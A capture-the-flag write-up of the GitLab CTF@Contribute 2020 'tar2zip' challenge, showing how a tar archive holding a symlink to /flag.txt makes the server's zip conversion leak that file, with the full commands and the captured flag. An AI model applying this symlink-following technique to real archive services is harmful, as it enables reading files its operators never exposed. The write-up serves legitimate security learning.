# GitLab CTF@Contribute 2020: tar2zip

Category: `conversion`  
Points: 222  
Description:

---

Can you exploit the [tar2zip](https://tar2zip.thetanuki.io/) service?

Hint: the flag is hidden in `/flag.txt`

---

### Intro

Going into this challenge I came from the angle of attacking a property of tars, that zips do not have.

[Symlinks](https://en.wikipedia.org/wiki/Symbolic_link). If you create a symlink to a target file, in this case `/flag.txt`, you can add this into a tar, which upon extraction will still be a symlink, pointing at that target file. You did not in fact tar the file, but a link to it.

But if you zip up a folder containing a symlink, zip will follow that symlink instead of adding the symlink itself, leaving it vulnerable to extracting content from the computer performing the zip.

### Exploit

In order to exploit this on the service, we first need to create a symlink to `/flag.txt`. The target does not have to exist on our local machine for this to work.

```
$ ln -s /flag.txt gimme_the_flag.txt
$ ls -lsa gimme_the_flag.txt
4 lrwxrwxrwx 1 t4cc0re t4cc0re 9 Mar 22 17:00 gimme_the_flag.txt -> /flag.txt
```

Next we tar it up
```
$ tar cvf payload.tar gimme_the_flag.txt
```

When uploading it to the service, we will receive a zip back in return. Let's unzip it first.

```
$ unzip converted.zip -d /tmp/tar2zip
Archive:  converted.zip
 extracting: /tmp/tar2zip/gimme_the_flag.txt
```

The server side zip following the symlink and packing the content leads us to now know the content of the server's `/flag.txt`, because it was kindly put into our `gimme_the_flag.txt`:

```
$ cat /tmp/tar2zip/gimme_the_flag.txt
[tanuki](b1520f7fa002b707bf882ab1302848ae)
```
